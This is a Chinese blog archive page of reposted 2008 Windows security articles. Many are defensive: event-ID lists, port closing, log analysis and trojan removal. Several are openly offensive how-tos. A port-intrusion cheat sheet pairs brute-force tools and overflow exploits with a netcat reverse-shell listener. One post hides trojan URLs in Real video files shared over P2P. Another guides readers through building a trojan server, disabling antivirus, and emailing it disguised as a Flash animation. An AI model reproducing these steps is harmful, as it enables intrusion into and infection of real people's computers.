跳到主要內容

發表文章

目前顯示的是 12月, 2008的文章

安全事件日誌中的事件編號與描述

安全事件日誌中的事件編號與描述 -------------------------------------------------------------------------------- 帳號登入事件 (事件編號與描述) 672 身份驗證服務(AS)票證得到成功發行與驗證。 673 票證使用權服務(TGS)票證得到使用權。TGS是一份由Kerberos 5.0版票證使用權服務(TGS)發行、且允許用戶針對域中特定服務進行身份驗證的票證。 674 安全主體重建AS票證或TGS票證。 675 預身份驗證失敗。這種事件將在用戶輸入錯誤密碼時由密鑰分發中心(KDC)產生。 676 身份驗證票證請求失敗。這種事件在Windows XP Professional作業系統或Windows Server產品家族成員中將不會產生。 677 TGS票證無法得到使用權。這種事件在Windows XP Professional作業系統或Windows Server產品家族成員中將不會產生。 678 指定帳號成功映射到一個域帳號。 681 登入失敗。域帳號嘗試進行登入。這種事件在Windows XP Professional作業系統或Windows Server產品家族成員中將不會產生。 682 用戶重新連線到一個已經中斷連線連接的終端伺服器會話上。 683 用戶在沒有註銷的情況下與終端伺服器會話中斷連線連接。 帳號管理事件 624 一個用戶帳號被新增。 627 一個用戶密碼被修改。 628 一個用戶密碼被設定。 630 一個用戶密碼被移除。 631 一個全局組被新增。 632 一個成員被增加到特定全局組中。 633 一個成員從特定全局組中被移除。 634 一個全局組被移除。 635 一個新的本機組被新增。 636 一個成員被增加到本機組中。 637 一個成員從本機組中被移除。 638 一個本機組被移除。 639 一個本機組帳號被修改。 641 一個全局組帳號被修改。 642 一個用戶帳號被修改。 643 一個域原則被修改。 644 一個用戶帳號被自動鎖定。 645 一個電腦帳號被新增。 646 一個電腦帳號被修改。 647 一個電腦帳號被移除。 648 一個禁用安全特性的本機安全組被新增。說明:正式名稱中的SECURITY_DISABLED意味著這個組無法用於在訪問檢查中授予權限。

關閉連接阜詳解

關閉連接阜詳解 我相信有很多人都不知道自己開了什麼連接阜.更加不知道怎麼關閉連接阜. 你可以用檢視連接阜的軟體檢視. 也可以通過在執行裡輸入"cmd" 在彈出的cmd指令行裡輸入 netstat -an 來檢視自己開放連接阜.ip位址的後面的就是連接阜號. 以下是我自己寫的一篇關於關閉連接阜的詳細步驟和多種方法 有很多人問我如何關閉連接阜,所以我(流雲)整理了一下關於關閉連接阜的資料,並給大家寫這篇文章介紹關於關閉連接阜的多種方法(包括系統的方法:修改註冊表和關閉服務;通過新增 IP 安全原則來遮閉連接阜的方法;增加防火牆的規則遮閉連接阜;通過本機連接的TCP/IP篩選來過濾連接阜由於入侵的基礎就在於連接阜,所以關閉掉可能會被入侵的連接阜,這樣你的電腦的安全悉數就提高了.這裡先介紹一下,關於入侵最多的幾個連接阜的系統關閉方法. 1.系統關閉方法: (1)21連接阜: 連接阜說明: ftp 最一般的攻擊者用於尋找開啟「anonymous」的ftp伺服器的方法。 這些伺服器帶有可讀寫的目錄。Hackers或Crackers 利用這些伺服器 作為傳送warez (私有程序) 和pr0n(故意拼錯詞而避免被搜尋引擎分 類)的節點。 關閉方法:控制台--系統管理工具--服務 關閉FTP Publishing Service,它提供的服務是通過 Internet 訊息服務 的管理單元提供 FTP 連接和管理。 (2)23連接阜 連接阜說明:Telnet 入侵者在搜尋遠端登入UNIX的服務。大多數情況下入侵者掃 描這一連接阜是為了找到機器執行的作業系統。此外使用其它技術,入 侵者會找到密碼。 關閉方法:控制台--系統管理工具--服務 關閉Telnet服務,它允許遠端用戶登入到系統並且使用指令行執行控 制台程序。 (3)25連接阜 連接阜說明:smtp 攻擊者(spammer)尋找SMTP伺服器是為了傳送他們的spam。 入侵者的帳戶總被關閉,他們需要撥號連線到高帶寬的e-mail伺服器 上,將簡單的訊息傳送到不同的位址。SMTP伺服器(尤其是sendmail) 是進入系統的最常用方法之一,因為它們必須完整的暴露於Internet且 郵件的路由是複雜的(暴露+複雜=弱點)。 關閉方法:控制台--系統管理工具--服務 關閉Simple Mail Transport

快速掌握典型入侵日誌分析

快速掌握典型入侵日誌分析 如今各式各樣的Windows漏洞層出不窮,五花八門的入侵工具更是令人眼花繚亂,稍微懂點網路知識的人都可以利用各種入侵工具進行入侵,這可給我們的網管帶來了很大的麻煩,雖然經過精心配置的服務器可以抵禦大部分入侵,但隨著不斷新出的漏洞,再高明的網管也不敢保證一台務器長時間不會被侵入,所以,安全配置服務器並不能永遠阻止黑客入侵,而如何檢測入侵者行動以保證服務器安全性就在這樣的情況下顯得非常重要。   日誌文件作為微軟Windows系列操作系統中的一個特殊文件,在安全方面具有無可替代的價值。它每天為我們忠實地記錄下系統所發生一切事件,利用它可以使系統管理員快速對潛在的系統入侵作出記錄和預測,但遺憾的是目前絕大多數的人都忽略了它的存在,反而是因為黑客們光臨才會使我們想起這個重要的系統日誌文件,很有諷刺意味。   在這裡我們就不去講什麼日誌文件的預定位置、常見備份方法等基本技巧了,我們今天來看看如何分析常見的日誌文件吧!   1.FTP日誌分析   FTP日誌和WWW日誌在預定情況下,每天產生一個日誌文件,包含了該日的一切記錄,文件名通常為ex(年份)(月份)(日期)。例如ex040419,就是2004年4月19日產生的日誌,用記事本可直接打開,普通的有入侵行為的日誌一般是這樣的:   #Software: Microsoft Internet Information Services 5.0(微軟IIS5.0)   #Version: 1.0 (版本1.0)   #Date: 20040419 0315 (服務啟動時間日期)   #Fields: time cip csmethod csuristem scstatus   0315 127.0.0.1 [1]USER administator 331(IP位址為127.0.0.1用戶名為administator試圖登入)   0318 127.0.0.1 [1]PASS – 530(登入失敗)   032:04 127.0.0.1 [1]USER nt 331(IP位址為127.0.0.1用戶名為nt的用戶試圖登入)   032:06 127.0.0.1 [1]PASS – 530(登入失敗)   032:09 127.0.0.1 [1]USER cyz 331(IP位址為127.0.0.1用戶名為c

讓別人 Ping 不到你的電腦

讓別人 Ping 不到你的電腦 在黑客入侵尋找對象時,大多都使用Ping指令來檢測主機,如果Ping不通,水準差的「黑客」大多就會知難而退。事實上,完全可以造成一種假相,即使我們在線,但對方Ping時也不能相通,這樣就能躲避很多攻擊。 第一步:增加獨立管理單元 開始-執行,輸入:mmc,啟動開啟「控制台」視窗。再點選「控制台」功能表下的「增加/刪除管理單元」,按下「增加」按鈕,在彈出的視窗中選項「IP安全原則管理」項,按下「增加」按鈕。在開啟視窗中選項管理對像為「本機電腦」,按下「完成」按鈕,同時關閉「增加/刪除管理單元」視窗,返回主控台。 第二步:新增IP安全原則 右擊剛剛增加的「IP安全原則,在本機機器」,選項「新增IP安全原則」,按下「下一步」,然後輸入一個原則描述,如「no Ping」。按下「下一步」,選「啟動預設回應規則」複選項,按下「下一步」。開始設定身份驗證方式,選「此字串串用來保護密鑰交換(預共享密鑰)」選項,然後隨便輸入一些字串(下面還會用到這些字串)。按下「下一步」,就會提示已完成IP安全原則,驗證選了「編輯內容」複選框,按下「完成」按鈕,會開啟其內容對話視窗。 第三步:配置安全原則 按下「增加」按鈕,並在開啟安全規則嚮導中按下「下一步」進行隧道終結設定,在這裡選項「此規則不指定隧道」。按下「下一步」,並選項「所有網路連接」以保證所有的電腦都Ping不通。按下「下一步」,設定身份驗證方式,與上面一樣選項第三個選項「此字串串用來保護密鑰交換(預共享密鑰)」並填入與剛才相同的內容。按下「下一步」,在開啟視窗中按下「增加」按鈕,開啟「IP篩選器列表」視窗。按下「增加」,按下「下一步」,設定源位址為「我的IP位址」,按下「下一步」,設定目標位址為「任何IP位址」,按下「下一步」,選項傳輸協定為ICMP,現在就可依次按下「完成」和「關閉」按鈕返回。此時,可以在 IP篩選器列表中看到剛剛新增的篩選器,將其選之後按下「下一步」,選項篩選器操作為「要求安全性設定」選項,然後依次點擊「完成」、「關閉」按鈕,儲存相關的設定返回管理控制台。 第四步:指派安全原則 最後只需在「控制台根節點」中右擊配置好的「禁止Ping」原則,選項「指派」指令使配置生效。經過上面的設定,當其他電腦再Ping該電腦時,就不再相通了。但如果自己Ping本機電腦,仍可相通。此法對於Window

打造應用層防火牆(Layer 7 Filter)

打造應用層防火牆(Layer 7 Filter) 與一般的 Packet Filter 防火牆不同,應用層防火牆是在 OSI Model 中的第七層(應用層)運作,因此它可以針對各種應用程式的封包進行過濾。比較常見的應用有阻擋 MSN 通訊、限制 P2P 連線使用的頻寬、限制網路電視等等,只要是應用層防火牆有支援的協定皆可以管控。Linux 預設的情況下是不支援 L7 filter(應用層防火牆)功能的,必須要自己 patch kernel 與 netfilter 才能讓 Linux 支援此項功能。 所需套件: 1.kernel source (eg. linux-2.6.22.tar.gz) 官方網站: http://kernel.org/ 2.netfilter source (eg. iptables-1.3.8.tar.bz2) 官方網站: http://netfilter.org/ 3.l7-filter kernel version (eg. netfiilter-layer7-v2.13.tar.gz) 官方網站: http://sourceforge.net/project/showf...group_id=80085 4.Protocol definitions (eg. l7-protocols-2007-07-27.tar.gz) 官方網站: http://sourceforge.net/project/showf...group_id=80085 各個套件的用途如下。 1. kernel source:Linux 的核心原始程式碼 2. netfilter source:Linux 防火牆(netfilter)的原始程式碼 3. l7-filter kernel version:kernel 版的 l7 filter。(也有 userspace 版的) 4. Protocol definitions:定義各種應用層的協定的檔案。 註: l7-filter 完整的支援協定列表可參考此網址: http://l7-filter.sourceforge.net/protocols 實做的步驟: 1. Patch, Config

查明是否有人開過你的電腦

查明是否有人開過你的電腦 你是否懷疑別人開過你的電腦,但是卻苦無證據可查呢?其實Windows 2000/XP在每次開機或關機時,都會記錄下相關的資訊。這裡我們就來告訴你如何找出這些記錄,讓你清楚瞭解電腦是否被別人開過囉! STEP: 按下【開始】,在開始功能表找到【我的電腦】,並且在這個項目上按一下滑鼠右鍵,從選單中點選【管理】。 「電腦管理」視窗出現後中,在左邊窗格依序展開「系統工具」→「事件檢視器」→「系統」,並且在「系統」上按一下滑鼠左鍵。 在右邊窗格按下標題欄的「事件」按鈕,然後找到代號為「6006」的項目,這個項目就是關機時所產生的事件記錄,再比照記錄產生的時間,你就知道電腦在什麼時候曾經關機,也可以查出是否有其他人動過你的電腦了。

木馬是如何編寫的

木馬是如何編寫的 特洛依木馬這個名詞大家應該不陌生,自從98年「死牛崇拜」黑客小組公佈Back Orifice以來,木馬猶如 平地上的驚雷, 使在Dos——Windows時代中長大的中國線人從五彩繽紛的網路之夢中驚醒,終於認識到 的網路也有它邪惡的一面,一時間人心惶惶。   我那時在《電腦報》上看到一篇文章,大意是一個菜鳥被人用BO控制了,嚇得整天吃不下飯、睡不著 覺、上不了網,到處求救!要知道,木馬(Trojan)的歷史是很悠久的:早在AT&T Unix和BSD Unix十分 盛行的年代,木馬是由一些玩程式(主要是C)水準很高的年輕人(主要是老美)用C或Shell語言編寫的 ,基本是用來竊取登入主機的密碼,以取得更高的權限。那時木馬的主要方法是誘騙——先修改你 的.profile文件,植入木馬;當你登入時將你敲入的密碼字串存入一個文件,用Email的形式發到攻擊者 的郵信箱裡。國內的年輕人大都是在盜版Dos的熏陶下長大的,對網路可以說很陌生。直到Win9x橫空出世, 尤其是WinNt的普及,大大推動了網路事業的發展的時候,BO這個用三年後的眼光看起來有點簡單甚至可 以說是簡陋的木馬(甚至在Win9x的「關閉程序」對話視窗可以看到工作)給了當時中國人極大的震撼,它 在中國的網路安全方面可以說是一個劃時代的軟體。   自己編寫木馬,聽起來很Cool是不是?!木馬一定是由兩部分組成——伺服器程序(Server)和客戶 端程序(Client),伺服器負責開啟攻擊的道路,就像一個內奸特務;客戶端負責攻擊目標,兩者需要一 定的網路傳輸協定來進行通訊(一般是TCP/IP傳輸協定)。為了讓大家更好的瞭解木馬攻擊技術,破除木馬的神秘 感,我就來粗略講一講編寫木馬的技術並順便編寫一個例子木馬,使大家能更好地防範和查殺各種已知和 未知的木馬。   首先是編程工具的選項。目前流行的開發工具有C++Builder、VC、VB和Delphi,這裡我們選用 C++Builder(以下簡稱BCB);VC雖然好,但GUI設計太複雜,為了更好地突出我的例子,集中注意力在木 馬的基本原理上,我們選用可視化的BCB;Delphi也不錯,但缺陷是不能繼承已有的資源(如「死牛崇拜 」黑客小組公佈的BO2000來源碼,是VC編寫的,網上俯拾皆是);VB嘛,談都不談——難道你還給受害者 傳一個1兆多的動

連接阜入侵

1. 1433連接阜入侵 scanport.exe 查有1433的機器 SQLScanPass.exe 進行字典暴破(字典是關鍵) 最後 SQLTools.exe入侵 ============================= 對sql的sp2及以下的系統,可用sql的hello 溢出漏洞入侵。 nc -vv -l -p 本機連接阜 sqlhelloF.exe 入侵ip 1433 本機ip 本機連接阜 (以上反向的,測試成功) sqlhelloz.exe 入侵ip 1433 (這個是正向連接) 2. 4899連接阜入侵 用4899過濾器.exe,掃瞄空口令的機器 3. 3899的入侵 對很早的機器,可以試試3389的溢出(win3389ex.exe) 對2000的機器,可以試試字典暴破。(tscrack.exe) 4. 80入侵 對sp3以前的機器,可以用webdav入侵; 對bbs論壇,可以試試上傳漏洞(upfile.exe或dvup_delphi.exe) 可以利用SQL進行注入。(小榕的注入軟件)。 5. serv-u入侵(21連接阜) 對5. 004及以下系統,可用溢出入侵。(serv5004.exe) 對5.1.0.0及以下系統,可用本機提升權限。(servlocal.exe) ====================================== 對serv-u的MD5加密密碼,可以用字典暴破。(crack.vbs) 輸入一個被serv-u加密的密碼(34位長),通過與字典檔(dict.txt)的比較,得到密碼。如:cscript crack.vbs ib0AD10648F17E9E8D1FF316C1BA75105A 6. 554連接阜 用real554.exe入侵。 7. 6129連接阜 用DameWare6129.exe入侵。 8. 系統漏洞 利用135、445連接阜,用ms03026、ms03039、ms03049、ms04011漏洞, 進行溢出入侵。 9. 3127等連接阜 可以利用doom病毒開的連接阜,用nodoom.exe入侵。(可用mydoomscan.exe查)。 10. 其他入侵 利用shanlu的入侵軟件入侵(WINNTAutoAttack.exe)。

spoolsv木馬清除與補救

spoolsv木馬清除與補救 spoolsv.exe是一種延緩印表木馬程式,它使電腦CPU使用率達到100%,從而使風扇保持高速嘈雜運轉;該木馬允許攻擊者訪問你的電腦,竊取密碼和個人資料。 一、判別自己是否中毒 1、點開始-執行,輸入msconfig,Enter鍵,打開實用配置程式,選擇「啟動」, 感染以後會在啟動項裡面發現執行Spoolsv.exe的啟動項, 每次進入windows會有NTservice的交談視窗。 2、打開系統硬碟,假設C硬碟,看是否存在C:\WINDOWS\system32\spoolsv資料夾,裡面有個spoolsv.exe文件,有「傲訊瀏覽器輔助工具」的字樣說明,正常的spoolsv.exe印表機緩衝池文件應該在C:\WINDOWS\system32目錄下。 3,打開任務管理器,會發現spoolsv.exe工作行程,而且CPU佔用率很高 二、清除方法 1、重新啟動,開機按F8進入安全模式。 2、點開始-執行,輸入cmd,進入dos,利用rd命令刪除一下目錄(如果存在) C:\WINDOWS\system32\msibm    C:\WINDOWS\system32\spoolsv    C:\WINDOWS\system32\bakcfs    C:\WINDOWS\system32\msicn 比如在dos視窗下輸入:rd(空格)C:\WINDOWS\system32\spoolsv/s,Enter鍵,出現提示,輸入yEnter鍵,即可刪除整個目錄。 利用del命令刪除下面的文件(如果存在) C:\windows\system32\spoolsv.exe   C:\WINDOWS\system32\wmpdrm.dll 比如在dos視窗下輸入:del(空格)C:\windows\system32\spoolsv.exe,Enter鍵,即可刪除被感染的 spoolsv.exe,這個文件可以在殺毒結束後在別的正常的機器上複製正常的spoolsv.exe貼上去到C:\windows\system32 資料夾。 3、重啟按F8再次進入安全模式   (1)桌面右鍵點擊我的電腦,選擇「管理」,點擊「服務和應用程式」-「服務」,右鍵點擊NTservice,選擇「內容」,修改啟動類型為「禁用」。 (2)點開始,執行,輸入regedit,Enter鍵打開註

DLL後門完全清除方法

DLL後門完全清除方法 ·防止黑客入侵:DLL後門完全清除方法(1)   前言   後門!相信這個詞語對您來說一定不會陌生,它的危害不然而欲,但隨著人們的安全意識逐步增強,又加上殺毒軟件的"大力支持",使傳統的後門無法在隱藏自己,任何稍微有點電腦知識的人,都知道"查連接阜""看工作行程",以便發現一些"蛛絲馬跡"。所以,後門的編寫者及時調整了思路,把目光放到了動態鏈接程式庫上,也就是說,把後門做成DLL文件,然後由某一個EXE做為載體,或者使用Rundll32.exe來啟動,這樣就不會有工作行程,不開連接阜等特點,也就實現了工作行程、連接阜的隱藏。本文以"DLL的原理""DLL的清除""DLL的防範"為主題,並展開論述,旨在能讓大家對DLL後門"快速上手",不在恐懼DLL後門。好了,進入我們的主題。   一、DLL的原理   1,動態鏈接程式庫   動態鏈接程式庫,全稱ynamic Link Library,簡稱LL,作用在於為應用程式提供擴展功能。應用程式想要呼叫DLL文件,需要跟其進行"動態鏈接";從編程的角度,應用程式需要知道DLL文件匯出的API函數方可呼叫。由此可見,DLL文件本身並不可以執行,需要應用程式呼叫。正因為DLL文件執行時必須插入到應用程式的記憶體模塊當中,這就說明了LL文件無法刪除。這是由於Windows內部機製造成的:正在執行的程式不能關閉。所以,DLL後門由此而生!   2,DLL後門原理及特點   把一個實現了後門功能的代碼寫成一個DLL文件,然後插入到一個EXE文件當中,使其可以執行,這樣就不需要佔用工作行程,也就沒有相對應的PID 號,也就可以在任務管理器中隱藏。DLL文件本身和EXE文件相差不大,但必須使用程式(EXE)呼叫才能執行DLL文件。DLL文件的執行,需要EXE 文件載入,但EXE想要載入DLL文件,需要知道一個DLL文件的入口函數(既DLL文件的匯出函數),所以,根據DLL文件的編寫標準:EXE必須執行 DLL文件中的DLLMain()作為載入的條件(如同EXE的mian())。做DLL後門基本分為兩種:1)把所有功能都在DLL文件中實現;2

黑客隱蔽技巧:在Real影片中放置木馬

黑客隱蔽技巧:在Real影片中放置木馬 經常遇到rm影片播放時彈出網頁,一直不知道怎麼回事,前幾天看到了大眾軟體中一篇文章才知道插入和去除的方法,好東東不敢獨享,在網上搜了三篇相關文章,轉給大家拉!   在Real影片中放 木馬在P2P軟體裡,很多的Real影片都是危險的,這只是一個小技巧,輔助的一種入侵方式,但這種方法很有效果,比如在著名的A片交流軟體PP點點通裡,我下了一個這樣的小 木馬 ,兩天就有200個目標物,並且呈幾何狀增長.大家別做壞事。 使用Helix Producer Plus 9的rmevents.exe來修改影片的剪輯訊息,可以在指定時間開啟指定的視窗.   新增一個文本文件rmevents.txt. 輸入: u 00:01:00.0 00:01:30.0 http://yjs.bit.edu.cn/bbs 我來解釋一下,它意思是說在00:01:00.0 00:01:30.0這個時間範圍內開啟後面的URL,後面的URL就是我們的 木馬 位址。輸入rmevents -i 電影 .rm -e rmevents.txt -o 電影 1.rm 這個指令,產生的 電影 .rm就是我們的 木馬文件了。 http://yjs.bit.edu.cn/bbs 這個位址是你做好的網頁 木馬 的位址,不管是動鯊 木馬 啊,還是EXE2BMP的 木馬 ,還是什麼CHM 木馬 . 防禦方法更簡單,嘿嘿,不看 電影 就沒事了。要不就不用Realpalyer看吧,換別的播放器。   去除realoneplay,裡的網頁問題 這個彈出的網頁是由一開始壓制影片的人壓進去的廣告頁。可以通過 Helix Producer Plus V9.01 的rmevents.exe編輯掉。   方法一: 在你的安裝目錄C:\Program Files\Real\Helix Producer Plus\RealMediaEditor預設值是這個目錄,裡有一個rmevents.exe 在指令提示行cmd.exe下進入這個目錄,執行rmevents.exe 然後 建立一個內容為空的 events.txt 文件 rmevents -i input.rm -e events.txt -o output.rm input.rm為有廣告的原來的rmvb影片。 output.rm為轉換後的新影片名稱。 可以自訂

簡單方法尋找黑客的老巢

簡單方法尋找黑客的老巢 網路安全是一個綜合的、複雜的工程,任何網路安全措施都不能保證萬無一失。因此,對於一些重要的部門,一旦網路遭到攻擊,如何追蹤網路攻擊,追查到攻擊者並將其繩之以法,是十分必要的。   追蹤網路攻擊就是找到事件發生的源頭。它有兩個方面意義:一是指發現IP位址、MAC位址或是認證的主機名;二是指確定攻擊者的身份。網路攻擊者在實施攻擊之時或之後,必然會留下一些蛛絲馬跡,如登入的紀錄,文件權限的改變等虛擬證據,如何正確處理虛擬證據是追蹤網路攻擊的最大挑戰。   在追蹤網路攻擊中另一需要考慮的問題是:IP位址是一個虛擬位址而不是一個物理位址,IP位址很容易被偽造,大部分網路攻擊者採用IP位址欺騙技術。這樣追蹤到的攻擊源是不正確的。使得以IP位址為基礎去發現攻擊者變得更加困難。因此,必須採用一些方法,識破攻擊者的欺騙,找到攻擊源的真正IP位址。   ★ netstat指令--既時察看文擊者   使用netstat指令可以獲得所有連線被測主機的網路用戶的IP位址。Windows系列、Unix系列、Linux等常用網路作業系統都可以使用「netstat」指令。   使用「netstat」指令的缺點是只能顯示現用的連接,如果使用「netstat」指令時攻擊者沒有連線,則無法發現攻擊者的蹤跡。為此,可以使用Scheduler建立一個日程安排,安排系統每隔一定的時間使用一次「netstat」指令,並使用 netstat>>textfile格式把每次檢查時得到的資料寫入一個文本文件中,以便需要追蹤網路攻擊時使用。   ★ 日誌資料--最詳細的攻擊記錄   系統的日誌資料提供了詳細的用戶登入訊息。在追蹤網路攻擊時,這些資料是最直接的、有效的證據。但是有些系統的日誌資料不完善,網路攻擊者也常會把自己的活動從系統日誌中移除。因此,需要採取補救措施,以保證日誌資料的完整性。   Unix和Linux的日誌   Unix和Linux的日誌文件較詳細的記錄了用戶的各種活動,如登入的ID的用戶名、用戶IP位址、連接阜號、登入和結束時間、每個ID最近一次登入時間、登入的終端、執行的指令,用戶ID的帳號訊息等。通過這些訊息可以提供ttyname(終端號)和源位址,是追蹤網路攻擊的最重要的資料。   大部分網路攻擊者會把自己的活動記錄從日誌中刪去,而且UOP和關於X Windo

黑客種植木馬新方法及防範策略

黑客種植木馬新方法及防範策略 相信很多朋友都聽說過木馬程序,總覺得它很神秘、很高難,但事實上隨著木馬軟件的智能化,很多駭客都能輕鬆達到攻擊的目的。 今天,筆者就以最新的一款木馬程序——黑洞2004,從種植、使用、隱藏、防範四個方面來為網絡愛好者介紹一下木馬的特性。需要提醒大家的是,在使用木馬程序的時候,請先關閉系統中的病毒防火牆,因為殺毒軟件會把木馬作為病毒的一種進行查殺。   操作步驟:   一、種植木馬   現在網絡上流行的木馬基本上都採用的是C/S 結構(客戶端/服務端)。 你要使用木馬控制對方的電腦,首先需要在對方的的電腦中種植並運行服務端程序,然後運行本地電腦中的客戶端程序對對方電腦進行連接進而控制對方電腦。 為了避免不熟悉木馬的用戶誤運行服務端,現在流行的木馬都沒有提供單獨的服務端程序,而是通過用戶自己設置來生成服務端,黑洞2004也是這樣。 首先運行黑洞2004,點擊「功能/生成服務端」命令,彈出「服務端配置」界面。 由於黑洞2004採用了反彈技術(請參加小知識),首先單擊旁邊的「查看」按鈕,在彈出的窗口中設置新的域名,輸入你事先申請空間的域名和密碼,單擊「域名註冊」,在下面的窗口中會反映出註冊的情況。 域名註冊成功以後,返回「服務端配置」界面,填入剛剛申請的域名,以及「上線顯示名稱」、「註冊表啟動名稱」等項目。 為了迷惑他人,可以點「更改服務端圖標」按鈕為服務端選擇一個圖標。所有的設置都完成後,點擊「生成EXE型服務端」就生成了一個服務端。 在生成服務端的同時,軟件會自動使用UPX為服務端進行壓縮,對服務端起到隱藏保護的作用。   服務端生成以後,下一步要做的是將服務端植入別人的電腦? 常見的方法有,通過系統或者軟件的漏洞入侵別人的電腦把木馬的服務端植入其的電腦;或者通過Email夾帶,把服務端作為附件寄給對方;以及把服務端進行偽裝後放到自己的共享文件夾,通過P2P軟件(比如PP點點通、百寶等),讓網友在毫無防範中下載並運行服務端程序。   由於本文主要面對普通的網絡愛好者,所以就使用較為簡單的Email夾帶,為大家進行講解。 我們使用大家經常會看到的Flash動畫為例,建立一個文件夾命名為「好看的動畫」,在該文件夾裡邊再建立文件夾「動畫.files」,將木馬服務端軟件放到該文件夾中假設名稱為「abc.exe」,再在該文件夾內建立flash文件,在f

木馬的行為介紹-Svchost

木馬的行為介紹-Svchost 過年前我差點被這隻木馬搞瘋 一直出現 Svchost.exe訊息,上網時變的十分龜速,在windows\temp裡,竟然造成一堆垃圾,佔有 502 MB 之多,刪不掉,殺掉又會重生,殺到我手軟,簡直是「陰魂不散」---我判定大概是病毒搞的鬼---於是: 用NOD32掃,抓不到,用 AVG Anti-Spyware 7.5.0.50也偵測不到,最後乾脆用搜尋的,找到了兩隻,一隻在windows\裡,另 一隻在windows\system32\裡,無法判定哪一隻是對的,跑去別人家找,原來正確的是在windows\system32里 搞怪的就在windows\裡的這一隻,用刪的,刪不掉,用 Unlock,說重新開機後會刪,結果開機後,依然存在 ,再刪它,依然不動如山,真氣死我也!最後用 Ghost才解決問題。 後來找到了這篇,才得知它是令人討厭的「木馬」,提供大家參考: 1. Svchost這支木馬跟系統中預設的程式Svchost.exe名稱一模一樣,目前在網路 上查不到任何的資訊,也就是在一些安全軟體的木馬資料中並沒有它的特徵 值,所以無法偵測到它的存在。也因它的名稱是用系統中原本就有的檔案名 稱,一般使用者很難去查覺。 2. 它會將本身程式(Svchost.exe)放在c:\windows中,正常的Svchost是存放在 c:\windows\system32中。 3. 它會主動用80-Port連線至下列的IP: 61.220.57.10 61.221.104.67 如何清除Svchost 1. 查看Registry中是否有下列任一機碼,如果有的話請將它刪除: [HKET_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] 「Svchost.exe」=」c:\windows\Svchost.exe」 [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run] 「Svchost.exe」=」c:\windows\Svchost.exe」 [HEKY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run] 「Svchost.exe」=

洋蔥心

呵呵~已經N百年沒有好好寫過日誌了︿o︿ 這個年底好不容易事情都告一段落了 好在當初設定的目標都有達成 MCSE證照,整整考了一年 從去年11月到今年11月 七科考試(80美金*7=心疼) 很高興最近事情都進行得很順利 但是小弟的犯賤個性又出現了 平淡中想要激浪 迴盪中想要平穩 一直覺得自己有兩種個性 一個是太陽的金牛 一個是金星的雙子 兩種極端的互相交替 現在是不是又輪到雙子的活躍出現了呢 但是最近的景氣這麼差 好像真的不能動太多鬼點子 每年年底想換工作的想法 變成想找時間進修的妥協 唉唉唉~ 公職、碩士、證照 還滿猶豫的 公職,是還沒出生就告訴自己,絕不當公務人員的心願,和如今的再檢視 碩士,是當初的一個目標之一,卻也變成今日的科系掙扎和目的性問題 證照,是最原始的既定目標,但看到這樣的茫茫人海與前輩,對這樣的未來開始猶豫 what do you want? 我也開始這樣問自己 是不是年紀老了,真的就沒有勇氣了呢 或開始越想越多,越來越猶豫了呢 『洋蔥心... 一絲一絲的小心翼翼收納自己的心情 一點一滴的不著痕跡種下用心的種子 一瓣一瓣的輕輕慢慢地對你輕聲訴說 一片一片的刻意躲藏我全部對你的心』